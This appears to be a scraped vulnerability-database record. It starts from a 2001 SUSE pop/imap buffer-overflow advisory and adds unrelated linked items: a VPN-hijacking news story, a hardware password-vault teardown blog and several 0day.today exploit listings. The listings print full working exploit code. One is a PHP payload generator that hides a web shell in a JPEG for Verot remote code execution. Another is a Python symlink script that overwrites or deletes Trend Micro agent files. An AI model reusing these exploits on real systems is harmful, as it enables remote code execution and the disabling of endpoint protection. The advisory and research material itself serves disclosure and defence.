ID: SUSE-SA:2001:06
Type: suse
Reporter: Suse
Modified: 2001-03-21T19:19:00
Description
The eMail access daemons imapd(8), ipop2d(8) and ipop3d(8) of SuSE 6.1 are vulnerable to several buffer overflows. Due to a misconfiguration these vulnerabilities could be triggered remotely after a user had been authenticated.
{"bulletinFamily": "unix", "hash": "980f99bcabb20eb55a9f7b359724608a5934763f5257991a4a9b77f43d076bf4", "id": "SUSE-SA:2001:06", "lastseen": "2016-09-04T11:21:38", "description": "The eMail access daemons imapd(8), ipop2d(8) and ipop3d(8) of SuSE 6.1 are vulnerable to several buffer overflows. Due to a misconfiguration these vulnerbilities could be triggered remotely after a user had been authenticated.", "objectVersion": "1.2", "cvelist": [], "viewCount": 3, "published": "2001-03-21T19:19:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2001-03/msg00011.html", "references": [], "reporter": "Suse", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "title": "remote command execution in pop", "history": [], "modified": "2001-03-21T19:19:00", "enchantments": {"score": {"value": 4.1, "vector": "NONE", "modified": "2016-09-04T11:21:38"}, "dependencies": {"references": [{"type": "zeustracker", "idList": ["ZEUSTRACKER:IP", "ZEUSTRACKER:DOMAIN"]}, {"type": "hackread", "idList": ["HACKREAD:A30CCF4EB25F9A22272B650240A3F745", "HACKREAD:88C21A162233506FECD4DE8A1F3CE4DD", "HACKREAD:05884CA6BA0E955819C0DF6FC5FEABC2"]}, {"type": "jvn", "idList": ["JVN:89046645"]}, {"type": "threatpost", "idList": ["THREATPOST:C5C8575BBA8A982097567E3906CBC585", "THREATPOST:F8E40CE953E7B06C2A30BE461AE309C6", "THREATPOST:728B7B7DADCC6A87A1FC1388B993CC16"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:26E41CDD63099CCD1573FB00E53345FC"]}, {"type": "d0znpp", "idList": ["D0ZNPP:3F1EAA7673472FF56D4FCAC9354D181C"]}, {"type": "thn", "idList": ["THN:57D305F7A6E062E1DBDE22228481D711", "THN:AF2759606567B1C62B76706F16A896F2", "THN:6CAB25899790818F7BE75FBB1477A3EA"]}, {"type": "wired", "idList": ["WIRED:6873A690E14F93A04324F13CCEE7BAB8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F892F69CEA5DFAA8DAAB800F02E48EB8", "MALWAREBYTES:AE04E2AD6972F792896F48328EC943C9"]}, {"type": "cisco", "idList": ["CISCO-SA-20190612-IOSXE-CSRF"]}, {"type": "mssecure", "idList": 
["MSSECURE:3927DF6165C70804A2042AD0FC1210F7"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:7676A73FC7A006BE01E5B85BF31359BC"]}], "modified": "2016-09-04T11:21:38"}, "vulnersScore": 4.1}, "type": "suse", "affectedPackage": [{"arch": "i386", "packageFilename": "pop-2001.3.21-0.i386.rpm", "OSVersion": "6.1", "operator": "lt", "packageName": "pop", "packageVersion": "2001.3.21-0", "OS": "openSUSE"}, {"arch": "alpha", "packageFilename": "pop-2001.3.21-0.alpha.rpm", "OSVersion": "6.1", "operator": "lt", "packageName": "pop", "packageVersion": "2001.3.21-0", "OS": "openSUSE"}]}
{"thn": [{"lastseen": "2019-12-06T12:33:52", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-WMkBOTVhvWY/Xeo0rDTtwyI/AAAAAAAA17s/FVhvLMEY1qs7YWBRRvq_YhwWs1uqQpxjwCLcBGAsYHQ/s728-e100/linux-vpn-hacking.jpg>)\n\nA team of cybersecurity researchers has disclosed a new severe vulnerability affecting most Linux and Unix-like operating systems, including FreeBSD, OpenBSD, macOS, iOS, and Android, that could allow remote 'network adjacent attackers' to spy on and tamper with encrypted VPN connections. \n \nThe vulnerability, tracked as CVE-2019-14899, resides in the networking stack of various operating systems and can be exploited against both IPv4 and IPv6 TCP streams. \n \nSince the vulnerability does not rely on the VPN technology used, the attack works against widely implemented virtual private network protocols like OpenVPN, WireGuard, IKEv2/IPSec, and more, the researchers confirmed. \n\n\n \nThis vulnerability can be exploited by a network attacker \u2014 controlling an access point or connected to the victim's network \u2014 just by sending unsolicited network packets to a targeted device and observing replies, even if they are encrypted. 
\n \nAs explained by the researchers, though there are variations for each of the impacted operating systems, the vulnerability allows attackers to: \n \n\n\n * determine the virtual IP address of a victim assigned by the VPN server,\n * determine if there is an active connection to a given website,\n * determine the exact seq and ack numbers by counting encrypted packets and/or examining their size, and\n * inject data into the TCP stream and hijack connections.\n \n\n\n> \"The access point can then determine the virtual IP of the victim by sending SYN-ACK packets to the victim device across the entire virtual IP space,\" the team said in its [advisory](<https://seclists.org/oss-sec/2019/q4/122>).\n\n \n\n\n> \"When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds with a RST; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker.\"\n\n \nWhile explaining variations in the behavior of different operating systems, as an example, researchers said the attack does not work against macOS/iOS devices as described. \n \nInstead, an attacker needs to \"use an open port on the Apple machine to determine the virtual IP address.\" In their testing, the researchers use \"port 5223, which is used for iCloud, iMessage, FaceTime, Game Center, Photo Stream, and push notifications, etc.\" \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nThe researchers tested and successfully exploited the vulnerability against the following operating systems and the init systems, but they believe this list could go long as researchers test the flaw on more systems. 
\n \n\n\n * Ubuntu 19.10 (systemd)\n * Fedora (systemd)\n * Debian 10.2 (systemd)\n * Arch 2019.05 (systemd)\n * Manjaro 18.1.1 (systemd)\n * Devuan (sysV init)\n * MX Linux 19 (Mepis+antiX)\n * Void Linux (runit)\n * Slackware 14.2 (rc.d) \n * Deepin (rc.d)\n * FreeBSD (rc.d) \n * OpenBSD (rc.d)\n \n\"Most of the Linux distributions we tested were vulnerable, especially Linux distributions that use a version of systemd pulled after November 28th of last year, which turned reverse path filtering off,\" the researchers said. \n \n\"However, we recently discovered that the attack also works against IPv6, so turning reverse path filtering on isn't a reasonable solution.\" \n \nAs possible mitigation, researchers suggested to turn on reverse path filtering, implement bogon filtering, and encrypt packet size and timing to prevent attackers from making any inference. \n \nWhile the researchers have not yet revealed technical details of the vulnerability, they are planning to publish an in-depth analysis of this flaw and its related implications, after affected vendors, including Systemd, Google, Apple, OpenVPN, WireGuard, and different Linux distros issue satisfactory workarounds and patches.\n", "modified": "2019-12-06T11:26:06", "published": "2019-12-06T11:02:00", "id": "THN:FD10C34E4C222666AC0DBB5533C900AF", "href": "https://thehackernews.com/2019/12/linux-vpn-hacking.html", "type": "thn", "title": "New Linux Bug Lets Attackers Hijack Encrypted VPN Connections", "cvss": {"score": 0.0, "vector": "NONE"}}], "pentestpartners": [{"lastseen": "2019-12-06T14:27:06", "bulletinFamily": "blog", "description": "\n\n### TL:DR\n\nHardware security can be difficult to fathom, so I set out to research three password vaults as a newbie, sharing my findings.\n\nI picked three popular hardware vaults, each with different components, requiring different skills and equipment.\n\nHere's how I learned about disassembly, chipset research, understanding pinouts, protocols and breaking 
encryption. I hope it's useful!\n\n### Findings\n\nCredentials in plaintext. In a password vault. Yes really.\n\nCredentials that survive a hardware reset.\n\nReversible encryption.\n\nAnd plenty more!\n\n### Introduction\n\nI\u2019m Phil ([@Yekki_1](<https://twitter.com/Yekki_1>)), this is my first blog for PTP and my first hardware hacking project. I am lucky enough to be part of the [PTP Academy](<https://www.pentestpartners.com/about-us/ptp-academy/>) which gives me the opportunities to discover different areas of infosec. Up front I\u2019d like to thank the PTP hardware team ([@tautology](<https://twitter.com/tautology0>), [@cybergibbons](<https://twitter.com/cybergibbons>), and [@iskuri1](<https://twitter.com/Iskuri1>)) who gave guidance and taught me some of the more technical details.\n\nThis series of blogs will go through the basics of hardware hacking, including the stages of a hardware test, identifying chips, continuity tests and ultimately reading data directly from the chips on the board. 
I will be doing these basics with 3 standalone password vaults, each with different chipsets and intricacies.\n\nThe three devices which were tested are:\n\n**RecZone Password Safe**\n\n\n\n * Identifying components and understanding datasheets\n * Dumping SPI flash using a Raspberry Pi\n * Reading the plain text data dump\n\n**PasswordFast**\n\n\n\n * Undertaking continuity test to confirm pinouts\n * Investigating Microcontrollers\n * Recognising encrypted data and realising the right time to stop\n\nFull post here: [Hacking Hardware Password Managers: passwordsFAST](<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/>)\n\n**Vault Password Keeper**\n\n\n\n * Learning about CMOS flash and required hardware\n * Fully destructive methods of removing chips from the board\n * Using cryptoanalysis to decode stored data\n\nFull post: [Hacking Hardware Password Managers: Royal Vault Password Keeper](<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-royal-vault-password-keeper/>)\n\nAll these devices have a passcode to secure the device and the ability to add in the URL, username and password for each site. However one thing I did find consistent across all devices is the keyboard is hard to use and doesn\u2019t encourage strong, complicated passwords.\n\n### Device set up\n\nThe first device is the RecZone Password Safe.\n\n\n\nThe first step of any hardware job is to add data onto the device, it\u2019s important to add in a variety of data and can be beneficial to do lots of repeating letters and all possible characters, this will make it easier later on to identify the added data and helps with any decryption that might be required.\n\n\n\nOnce the data has been added, the next step is to get the case off and see what\u2019s underneath. 
For this device there were 4 rubber feet under which were the screws that held the case together.\n\n\n\nRemoving the screws and getting the back off, the board becomes exposed and is a straightforward board.\n\n### Initial Inspection\n\nThe next step is a visual inspection of the board, working out what the board contains and which parts are of interest.\n\nStarting with the back of the board:\n\n\n\nThis is a basic board with only a few components, there are connections to other parts of the device, including the battery (blue square), screen backlight (purple square) and reset button (green square). The part I was most interested in was the 8pin flash chip in the red square.\n\nThe flash chip is normally the storage on a device, so this is where our passwords are likely to be stored.\n\nMany chips can be identified by the text that appears on the top of them:\n\n\n\nThis chip is a 25Q40CT. Doing an internet search for this code, I was able to find the [datasheet](<https://html.alldatasheet.net/html-pdf/1151520/GIGADEVICE/GD25Q40CTEG/3543/5/GD25Q40CTEG.html>) which will be needed after the initial inspection is finished.\n\nWhat I wasn\u2019t able to identify on the back of the board was a microcontroller, effectively the brains behind the device.\n\nThe top of the board was interesting as there were a lot of connections and what are known as \u201cvias\u201d, these provide a direct connection between the different layers of the board, this board only has 2 layers, so it\u2019s a connection between the front and the back.\n\n\n\nIt is likely that these connect into something on the front of the board.\n\n\n\nThe front of the board has the keyboard connections. 
These types of connectors work by when the button is pressed, the metal circuit for each key is completed which sends a signal to the processor.\n\nThe backlight for the screen is connected by the wires on the right hand side, it is unlikely that all the vias on the back are for the screen.\n\nPrising the screen off was possible with a bit of force, however it is very destructive and it turned out to be near impossible to properly reconnect it to re-use the device. It\u2019s worth having spare devices when reverse engineering!\n\n\n\nThe screen was connected to the rails on the top and bottom allowing the display to work. A number of the vias however are used for the chip that was under the screen. This is a common thing nicknamed \u201cblob on board\u201d. It is done as a cost saving measure and although it can be removed, it\u2019s dangerous with a high risk of damage to the chip.\n\nFor an introduction I decided that trying to remove the epoxy was out of scope. Instead I decided to focus on the flash memory.\n\n### Chipset\n\nThis is where the [datasheet](<https://html.alldatasheet.net/html-pdf/1151520/GIGADEVICE/GD25Q40CTEG/3543/5/GD25Q40CTEG.html>) comes in handy. The chip is SPI flash, which is a common storage solution for small devices. The datasheet gives all the information about the chip, including which pin is for which function. This is critical to be able to read the data successfully.\n\nThe datasheet confirmed that the required voltage for the chip is 2.7~3.6V which means it was possible to power it up through a Raspberry Pi.\n\n### Continuity Testing\n\nTo confirm the information on the datasheet I undertook a continuity test. This test uses a multimeter to check connectivity between two pins. Simply set the multimeter to continuity mode:\n\n\n\nThis mode beeps when a circuit is made. 
On the board there was a ground testing pin, so putting one probe on that and the other on pin 4 of the chip, a circuit should be completed.\n\n\n\nThe reading on the multimeter shows that a circuit was successfully created, therefore I was confident that I knew the pin layout for the chip.\n\n### Connecting it up\n\nUsing the datasheet the pinout can be compared against the raspberry pi SPI pins. The pins for the chip are:\n\n\n\nThe names of the pins didn\u2019t tie up with the raspberry pi pins, so I had to find out what each pin was:\n\n * Vss \u2013 This is the main ground connection\n * Vcc \u2013 This is the power for the chip\n * CS# - Chip select \u2013 also known as slave select or (chip) enable it allows the selection of an integrated circuit out of several connected over the same bus. The chip on the board is the slave and what we read it from is the master.\n * SO/IO1 \u2013 Data Output. This is the pin we will use the read the data from the chip.\n * WP#/IO2 \u2013 Write protect input. Due to the fact we are reading, we might only have to write a single bit so this pin may not need to be connected.\n * Hold#/IO3 \u2013 Hold input. Again, we are mostly reading, so this pin might not be needed.\n * SCLK \u2013 This is the clock.\n * SI/IO0 \u2013 Data Input. As we will need to write a bit before we can read, this will be required to allow that write function.\n\nThe SPI specific pins on the raspberry pi are:\n\n\n\nThe key thing with SPI flash is that the MOSI (master output slave input) goes to SI (slave in) and MISO (master input slave output) goes to SO (slave out). The controller is the master and the flash chip is the slave. 
Normally when the chip is powered the MCU would be the master, however because I can connect and power the device through the chip, this lets the Pi interact with chip before the MCU can, resulting in the Pi becoming the master.\n\nConnecting the PI and the chip results in this wiring:\n\nThese connections allowed the chip to be powered without powering the rest of the board, the ground to be connected and the appropriate pins set up for reading the data.\n\nI used a clip to connect up the chip. If you don\u2019t have a clip it is possible to use grabbers to connect to each leg individually, however these make the entire process a lot more difficult.\n\n\n\nWhen connected, the pi was able to read the data. My pi was set up to have a static IP address and connected to a VM via a USB ethernet adapter allowing SSH access into the pi.\n\nTo read the data the pi needed the SPI interfaces enabled which is done via the raspi-config options\n\n_sudo raspi-config_\n\n\n\n### Dumping the Data\n\nI was able to confirm that the chip was wired up properly using a program called flashrom:\n\n_sudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000_\n\n\n\nThe program was able to detect the chip as a GigaDevice flash chip \u201cDG25Q40(B)\u201d. This meant that the chip was connected up properly and the data could be read off it.\n\nTo dump the data I appended the read flag and specified a file to output the data too.\n\n_sudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000 -r dump.bin_\n\n\n\nWhen the done message appeared, I knew that the data had been read. This however, wasn\u2019t the end of the job.\n\n### Reading the data\n\nThe next step was to see what data was on the chip. To read the data I used a program called hexdump:\n\n_hexdump -C dump.bin_\n\n\n\nI could not believe it, the data was stored on the chip, in plain text! 
These are the details that I input into the device at the start of this process.\n\nThis data should be encrypted as an absolute minimum for this\u2026 But it gets worse, I used the reset on the device and was asked to set a new master pin (as I had to at the very first bootup). I then re-dumped the chip:\n\n\n\nThe data was still there!\n\nWhat this means is if a user presses the reset button and sells the device, all of their passwords can still be read in plain text directly off the chip.\n\nThat is absolutely nuts!\n\nOn the second dump of the data I also found this:\n\n\n\nThis is the master 4 digit pin that I set after the reset. Again in plain text!\n\nSomeone using a device like this, hopefully wouldn\u2019t have password reuse, but it\u2019s not out of the realms of possibility, especially if it\u2019s a 4 digit code similar to things like, their phone pin, or their bank card.\n\nThere might have been a software based reset, rather than the hardware reset button which I would have liked to have tested but unfortunately I removed the screen too early which turned out to be fully destructive. 
This was a very valuable lesson I learnt about starting with the least destructive methods and only moving to most destructive once all other avenues have been looked at.\n\nWe reached out to the manufacturer of the device to inform them of this security vulnerability, however we did not receive any acknowledgement back from them.\n\nThis has been a very interesting first look into hardware hacking, I have learnt a lot from this device, including the process and the importance of not doing fully destructive testing until all other tests have been completed.\n\nIt did make me wonder though, what could they have done differently and have the other devices secured the data better?\n\nPart 2 of this series will look at [the PasswordFast device](<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/>) and will show an almost entirely different set of hardware to do a very similar job.\n\nFor reference here are the links to all three hacking hardware password manager posts: \n<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-the-reczone/> \n<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/> \n<https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-royal-vault-password-keeper/>", "modified": "2019-12-06T08:59:18", "published": "2019-12-06T08:59:18", "id": "PENTESTPARTNERS:7EAFACA4994042C9A2F94B2BE5060993", "href": "https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-the-reczone/", "type": "pentestpartners", "title": "Hacking Hardware Password Managers: The RecZone", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2019-12-06T13:54:54", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33628", "href": 
"https://0day.today/exploit/description/33628", "title": "Verot 2.0.3 - Remote Code Execution Exploit #RCE", "type": "zdt", "sourceData": "# Exploit Title: Verot 2.0.3 - Remote Code Execution\r\n# Date: 2019-12-05\r\n# Exploit Author: Jinny Ramsmark\r\n# Vendor Homepage: https://www.verot.net/php_class_upload.htm\r\n# Software Link: https://github.com/verot/class.upload.php\r\n# Version: <=2.0.3\r\n# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41\r\n# CVE : CVE-2019-19576\r\n\r\n<?php\r\n#Title: jpeg payload generator for file upload RCE\r\n#Author: Jinny Ramsmark\r\n#Github: https://github.com/jra89/CVE-2019-19576\r\n#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576\r\n#Usage: php inject.php\r\n#Output: image.jpg.phar is the file to be used for upload and exploitation\r\n\r\n#This script assumes no special transforming is done on the image for this specific CVE.\r\n#It can be modified however for different sizes and so on (x,y vars).\r\n\r\nini_set('display_errors', 1);\r\nerror_reporting(E_PARSE);\r\n#requires php, php-gd\r\n \r\n$orig = 'image.jpg';\r\n$code = '<?=exec($_GET[\"c\"])?>';\r\n$quality = \"85\";\r\n$base_url = \"http://lorempixel.com\";\r\n \r\necho \"-=Imagejpeg injector 1.7=-\\n\";\r\n \r\ndo\r\n{\r\n $x = 100;\r\n $y = 100;\r\n $url = $base_url . \"/$x/$y/\";\r\n \r\n echo \"[+] Fetching image ($x X $y) from $url\\n\";\r\n file_put_contents($orig, file_get_contents($url));\r\n} while(!tryInject($orig, $code, $quality));\r\n \r\necho \"[+] It seems like it worked!\\n\";\r\necho \"[+] Result file: image.jpg.phar\\n\";\r\n \r\nfunction tryInject($orig, $code, $quality)\r\n{\r\n $result_file = 'image.jpg.phar';\r\n $tmp_filename = $orig . 
'_mod2.jpg';\r\n \r\n //Create base image and load its data\r\n $src = imagecreatefromjpeg($orig);\r\n\r\n imagejpeg($src, $tmp_filename, $quality);\r\n $data = file_get_contents($tmp_filename);\r\n $tmpData = array();\r\n\r\n echo \"[+] Jumping to end byte\\n\";\r\n $start_byte = findStart($data);\r\n \r\n echo \"[+] Searching for valid injection point\\n\";\r\n for($i = strlen($data)-1; $i > $start_byte; --$i)\r\n {\r\n $tmpData = $data;\r\n for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)\r\n {\r\n $tmpData[$n] = $code[$z];\r\n }\r\n \r\n $src = imagecreatefromstring($tmpData);\r\n imagejpeg($src, $result_file, $quality);\r\n \r\n if(checkCodeInFile($result_file, $code))\r\n {\r\n unlink($tmp_filename);\r\n unlink($result_file);\r\n sleep(1);\r\n \r\n file_put_contents($result_file, $tmpData);\r\n echo \"[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\\n\";\r\n \r\n sleep(1);\r\n $src = imagecreatefromjpeg($result_file);\r\n \r\n return true;\r\n }\r\n else\r\n {\r\n unlink($result_file);\r\n }\r\n }\r\n unlink($orig);\r\n unlink($tmp_filename);\r\n return false;\r\n}\r\n \r\nfunction findStart($str)\r\n{\r\n for($i = 0; $i < strlen($str); ++$i)\r\n {\r\n if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)\r\n {\r\n return $i+2;\r\n }\r\n }\r\n \r\n return -1;\r\n}\r\n \r\nfunction checkCodeInFile($file, $code)\r\n{\r\n if(file_exists($file))\r\n {\r\n $contents = loadFile($file);\r\n }\r\n else\r\n {\r\n $contents = \"0\";\r\n }\r\n \r\n return strstr($contents, $code);\r\n}\r\n \r\nfunction loadFile($file)\r\n{\r\n $handle = fopen($file, \"r\");\r\n $buffer = fread($handle, filesize($file));\r\n fclose($handle);\r\n \r\n return $buffer;\r\n}\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33628"}, {"lastseen": "2019-12-06T16:00:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", 
"modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33630", "href": "https://0day.today/exploit/description/33630", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Exploit", "type": "zdt", "sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. 
\r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a browser (preferrably IE) and start the script\r\n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. 
Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" % filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe 
C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33630"}, {"lastseen": "2019-12-06T16:00:45", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33631", "href": "https://0day.today/exploit/description/33631", "title": "BeeGFS 7.1.3 Privilege Escalation Vulnerability", "type": "zdt", "sourceData": "============================================\r\nBeeGFS Privilege Escalation (CVE-2019-15897)\r\n============================================\r\n\r\n* Software: BeeGFS\r\n* Affected Versions: All versions upto and including 7.1.3\r\n* Vendor: ThinkparQ\r\n* CVE: CVE-2019-15897\r\n* Severity: CVSS 9.6 (Critical) [CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]\r\n* Author: John Fitzpatrick\r\n* Date: 2019-12-04\r\n\r\n\r\nDescription\r\n===========\r\n\r\nBeeGFS is a \"leading parallel cluster filesystem\", used in many HPC environments. A vulnerability exists in a default installation of BeeGFS which allows users to perform operations which allow them to elevate their privileges and become root. This is due to a failure to properly authenticate a user when performing filesystem operations. BeeGFS deployments utilising the BeeGFS cloudformation template were also affected by this issue.\r\n\r\nInstallations which are making use of connection-based authentication, using the \u201cconnAuthFile\u201d option to specify a shared key, are not affected by this issue if the shared key is only readable by root. 
Without a connAuthFile configured any host able to communicate with the BeeGFS cluster can become part of the cluster and mount the BeeGFS filesystem.\r\n\r\nIn order to resolve this issue BeeGFS users should configure connection-based authentication within their environment ensuring that the shared key is only readable by root. This will prevent non root users from exploiting this issue but will prevent non-root users from utilising utilities such as beegfs-ctl.\r\n\r\n\r\nSolution / Workaround\r\n=====================\r\n\r\nThis vulnerability can be mitigated by making use of the connAuthFile configuration option. This option, whilst intended to restrict which hosts can communicate with BeeGFS, can also be leveraged to prevent non root users from gaining root as a result of this weakness. This is done by setting the path to a shared key within the BeeGFS configuration file on each node. An example of this is shown below:\r\n\r\n connAuthFile = /etc/beegfs/connauthfile\r\n\r\nThe contents of the connAuthFile can be anything but must be the same on each host as this is a shared key. 
If this key is readable by non-root users then it will be ineffective in preventing the attacks described above (although it will still prevent hosts without access to the key from joining the cluster); the key must be configured to be readable only by root:\r\n\r\n $ ls -la /etc/beegfs/connauthfile \r\n -rw------- 1 root root 640 Aug 28 02:29 /etc/beegfs/connauthfile\r\n\r\nWith the connAuthFile option configured BeeGFS will derive a 64 bit key from the file containing the secret and this value is used to authenticate the communication channels when they are initially established as well as any subsequent communication channels.\r\n\r\nWhen configured, communications which have not first authenticated with this key are ignored and silently dropped by the BeeGFS cluster.\r\nThis mitigation does prevent non-root users from using any BeeGFS utilities (beegfs-ctl, beegfs-check-servers, etc.).\r\n\r\nNo specific fix has been provided by BeeGFS for this vulnerability, therefore updating versions of BeeGFS will (currently) not resolve this issue. 
